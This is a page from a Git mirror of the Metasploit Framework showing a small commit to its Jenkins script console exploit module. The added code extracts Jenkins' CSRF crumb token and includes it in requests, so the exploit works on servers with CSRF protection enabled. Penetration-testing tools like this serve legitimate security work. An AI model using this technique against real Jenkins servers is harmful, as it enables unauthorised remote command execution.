infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix jenkins when CSRF is enabled

bug/bundler_fix
Fernando Munoz 2014-10-14 19:33:23 -05:00
parent 1095d1dca3
commit 4c2ae1a753
1 changed files with 7 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/multi/http/jenkins_script_console.rb
View File

@ -80,6 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
} }
request_parameters['cookie'] = @cookie if @cookie != nil request_parameters['cookie'] = @cookie if @cookie != nil
request_parameters['vars_post']['.crumb'] = @crumb if @crumb != nil
res = send_request_cgi(request_parameters) res = send_request_cgi(request_parameters)
if not (res and res.code == 200) if not (res and res.code == 200)
fail_with(Failure::Unknown, 'Failed to execute the command.') fail_with(Failure::Unknown, 'Failed to execute the command.')
@ -145,6 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::Unknown) if not res fail_with(Failure::Unknown) if not res
@cookie = nil @cookie = nil
@crumb = nil
if res.code != 200 if res.code != 200
print_status('Logging in...') print_status('Logging in...')
res = send_request_cgi({ res = send_request_cgi({
@ -167,6 +169,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_status('No authentication required, skipping login...') print_status('No authentication required, skipping login...')
end end
if (res.body =~ /"\.crumb", "([a-z0-9]*)"/)
print_status("Using CSRF token: '#{$1}'");
@crumb = $1;
end
case target['Platform'] case target['Platform']
when 'win' when 'win'
print_status("#{rhost}:#{rport} - Sending command stager...") print_status("#{rhost}:#{rport} - Sending command stager...")